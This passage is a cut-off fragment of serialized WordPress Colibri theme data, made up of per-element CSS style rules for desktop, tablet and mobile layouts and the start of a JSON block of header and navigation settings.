10%;\n padding-right: 10%;\n padding-bottom: 10%;\n padding-left: 10%;\n transform: translateX(0%) translateY(0%);\n margin-top: 0%;\n margin-right: 0%;\n margin-bottom: 0%;\n margin-left: 0%;\n}\n\";}i:872;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-872 ol {\n list-style-type: decimal;\n}\n#colibri .style-872 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:873;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-873 {\n height: auto;\n min-height: unset;\n background-color: #F5FAFD;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:874;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:67:\"#colibri .style-874 {\n margin-right: 15px;\n margin-left: 15px;\n}\n\";}i:875;a:3:{s:7:\"desktop\";s:706:\"#colibri .style-875 {\n text-align: left;\n height: auto;\n min-height: unset;\n background-color: #f6f8fa;\n background-image: none;\n padding-top: 15%;\n padding-right: 20%;\n padding-bottom: 15%;\n padding-left: 20%;\n transform: translateX(6%) translateY(0%);\n transform-origin: center center 0px;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n box-shadow: 0px 5px 15px 2px rgba(0, 0, 0, 0.15) ;\n}\n\";s:6:\"tablet\";s:154:\"#colibri .style-875 {\n padding-top: 10%;\n padding-right: 15%;\n padding-bottom: 10%;\n padding-left: 15%;\n transform: translateX(5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:195:\"#colibri .style-875 {\n text-align: center;\n padding-top: 10%;\n padding-right: 10%;\n padding-bottom: 10%;\n padding-left: 10%;\n transform: translateX(0%) translateY(0%);\n margin-left: 0%;\n}\n\";}i:876;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-876 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:878;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-878 ol {\n list-style-type: decimal;\n}\n#colibri .style-878 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:879;a:3:{s:7:\"desktop\";s:874:\"#colibri .style-879 {\n text-align: center;\n height: auto;\n min-height: unset;\n background-position: center center;\n background-size: cover;\n background-image: url(\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-kevin-ku-w7ZyuGYNpRQ-unsplash-scaled-1.jpg\");\n background-attachment: scroll;\n background-repeat: no-repeat;\n box-shadow: 0px 10px 30px 2px rgba(0, 0, 0, 0.15) ;\n margin-top: 10%;\n margin-bottom: 10%;\n transform: translateX(-6%) translateY(0%);\n transform-origin: center center 0px;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 5px;\n border-top-right-radius: 5px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 5px;\n border-bottom-right-radius: 5px;\n border-left-width: 0px;\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:69:\"#colibri .style-879 {\n transform: translateX(-5%) translateY(0%);\n}\n\";s:6:\"mobile\";s:168:\"#colibri .style-879 {\n min-height: 350px;\n margin-top: 0%;\n margin-right: 0%;\n margin-bottom: 0%;\n margin-left: 0%;\n transform: translateX(0%) translateY(-5%);\n}\n\";}i:880;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:881;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-881 {\n height: auto;\n min-height: unset;\n background-color: #F5FAFD;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:882;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:883;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-883 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:893;a:3:{s:7:\"desktop\";s:251:\"#colibri .style-893 {\n text-align: left;\n font-size: 16px;\n color: #303e7a;\n}\n#colibri .style-893 p {\n font-size: 16px;\n color: #303e7a;\n}\n#colibri .style-893 ol {\n list-style-type: decimal;\n}\n#colibri .style-893 ul {\n list-style-type: disc;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:901;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-901 ul {\n list-style-type: disc;\n}\n#colibri .style-901 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:902;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-902 ul {\n list-style-type: disc;\n}\n#colibri .style-902 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:910;a:3:{s:7:\"desktop\";s:116:\"#colibri .style-910 {\n height: auto;\n min-height: unset;\n background-color: #F5FAFD;\n background-image: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:911;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:912;a:3:{s:7:\"desktop\";s:159:\".style-912 > .h-y-container > *:not(:last-child) {\n margin-bottom: 10px;\n}\n#colibri .style-912 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:913;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-913-image {\n opacity: 1;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-913-overlay {\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-913-caption {\n margin-top: 10px;\n}\n#colibri .style-913-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:914;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-914 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:915;a:3:{s:7:\"desktop\";s:201:\"#colibri .style-915 {\n font-style: italic;\n}\n#colibri .style-915 p {\n font-style: italic;\n}\n#colibri .style-915 ul {\n list-style-type: disc;\n}\n#colibri .style-915 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:917;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-917 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-917 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-917 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-917 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:918;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-918-image {\n opacity: 1;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-918-overlay {\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-918-caption {\n margin-top: 10px;\n}\n#colibri .style-918-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:919;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-919 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-919 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-919 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-919 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:920;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-920-image {\n opacity: 1;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-920-overlay {\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-920-caption {\n margin-top: 10px;\n}\n#colibri .style-920-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:921;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-921 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-921 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-921 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-921 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:922;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-922-image {\n opacity: 1;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-922-overlay {\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-922-caption {\n margin-top: 10px;\n}\n#colibri .style-922-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:923;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-923 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-923 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-923 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-923 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:924;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:925;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-925 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:926;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-926 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:970;a:3:{s:7:\"desktop\";s:61:\"#colibri .style-970 {\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:971;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:972;a:3:{s:7:\"desktop\";s:159:\".style-972 > .h-y-container > *:not(:last-child) {\n margin-bottom: 10px;\n}\n#colibri .style-972 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:973;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-973-image {\n opacity: 1;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-973-overlay {\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-973-caption {\n margin-top: 10px;\n}\n#colibri .style-973-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:974;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-974 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:975;a:3:{s:7:\"desktop\";s:201:\"#colibri .style-975 {\n font-style: italic;\n}\n#colibri .style-975 p {\n font-style: italic;\n}\n#colibri .style-975 ul {\n list-style-type: disc;\n}\n#colibri .style-975 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:976;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-976 ul {\n list-style-type: disc;\n}\n#colibri .style-976 ol {\n list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:977;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-977 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-977 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-977 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-977 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:978;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-978-image {\n opacity: 1;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-978-overlay {\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-978-caption {\n margin-top: 10px;\n}\n#colibri .style-978-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:979;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-979 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-979 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-979 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-979 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:980;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-980-image {\n opacity: 1;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-980-overlay {\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-980-caption {\n margin-top: 10px;\n}\n#colibri .style-980-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:981;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-981 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-981 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-981 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-981 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:982;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-982-image {\n opacity: 1;\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-982-overlay {\n border-top-width: 0px;\n border-top-style: none;\n border-top-left-radius: 300px;\n border-top-right-radius: 300px;\n border-right-width: 0px;\n border-right-style: none;\n border-bottom-width: 0px;\n border-bottom-style: none;\n border-bottom-left-radius: 300px;\n border-bottom-right-radius: 300px;\n border-left-width: 0px;\n border-left-style: none;\n}\n#colibri .style-982-caption {\n margin-top: 10px;\n}\n#colibri .style-982-frameImage {\n z-index: -1;\n transform: translateX(10%) translateY(10%);\n transform-origin: center center 0px;\n background-color: rgb(0,0,0);\n height: 100%;\n width: 100% ;\n border-top-width: 10px;\n border-top-color: rgb(0,0,0);\n border-top-style: none;\n border-right-width: 10px;\n border-right-color: rgb(0,0,0);\n border-right-style: none;\n border-bottom-width: 10px;\n border-bottom-color: rgb(0,0,0);\n border-bottom-style: none;\n border-left-width: 10px;\n border-left-color: rgb(0,0,0);\n border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:983;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-983 .icon-container {\n fill: rgb(163, 206, 250);\n width: 20px ;\n height: 20px;\n}\n#colibri .style-983 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-983 .icon-container:hover {\n fill: #303e7a;\n}\n#colibri .style-983 .social-icon-container {\n margin-right: 5px;\n padding-top: 5px;\n padding-right: 5px;\n padding-bottom: 5px;\n padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:984;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:985;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-985 {\n text-align: center;\n height: auto;\n min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:986;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-986 .text-wrapper-fancy svg path {\n stroke: #000000;\n stroke-linejoin: initial;\n stroke-linecap: initial;\n stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}}s:5:\"rules\";s:233464:\"[{\"id\":1,\"type\":\"hop-header\",\"v\":\"1.1\",\"nodes\":[\"7-h1\",\"22-h1\"]},{\"id\":2,\"style\":{\"ancestor\":{\"sticky\":{\"background\":{\"color\":\"#ffffff\"},\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"10\"},\"bottom\":{\"path\":\"value\",\"value\":\"10\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"0\",\"blur\":\"4\"}]}}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":20,\"unit\":\"px\"},\"bottom\":{\"path\":\"value\",\"value\":20,\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"background\":{\"color\":\"transparent\"}},\"type\":\"hop-navigation\",\"props\":{\"overlap\":true,\"sticky\":true,\"stickyStartAt\":\"immediately\",\"showTopBar\":false,\"width\":\"boxed\",\"layoutType\":\"logo-spacing-menu\"},\"v\":\"1.1\",\"nodes\":[\"7-h2\",\"22-h2\"]},{\"id\":3,\"props\":{\"containerWidth\":\"boxed\",\"layout\":{\"equalWidth\":false,\"itemsPerRow\":1,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\"},\"verticalInnerGap\":{\"unit\":\"px\"}}},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h3\",\"10-h3\",\"22-h3\"]},{\"id\":4,\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"7-h4\",\"22-h4\"]},{\"id\":5,\"type\":\"hop-logo\",\"props\":{\"horizontalTextAlign\":\"left\",\"media\":{\"mobile\":{\"horizontalTextAlign\":\"left\"}},\"layoutType\":\"text\"},\"v\":\"1.1\",\"nodes\":[\"7-h5\",\"22-h5\"],\"style\":{\"descendants\":{\"logo-text\":{\"typography\":{\"color\":\"${theme.colors.4}\"}},\"text\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"24\"}}}}}},{\"id\":6,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"props\":{\"verticalAlign\":\"center\",\"hide\":{\"mobile\":true}},\"type\":\"hop-column\",\"nodeId\":\"7-h66\",\"v\":\"1.1\",\"nodes\":[\"7-h6\",\"22-h6\"]},{\"id\":7,\"type\":\"hop-spacer\",\"nodeId\":\"7-h78\",\"v\":\"1.1\",\"nodes\":[\"7-h7\",\"10-h7\",\"22-h7\"]},{\"id\":8,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"textAlign\":\"center\",\"media\":{\"mobile\":{\"textAlign\":\"center\"}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"7-h8\",\"22-h8\"]},{\"id\":9,\"type\":\"hop-horizontal-menu\",\"style\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"p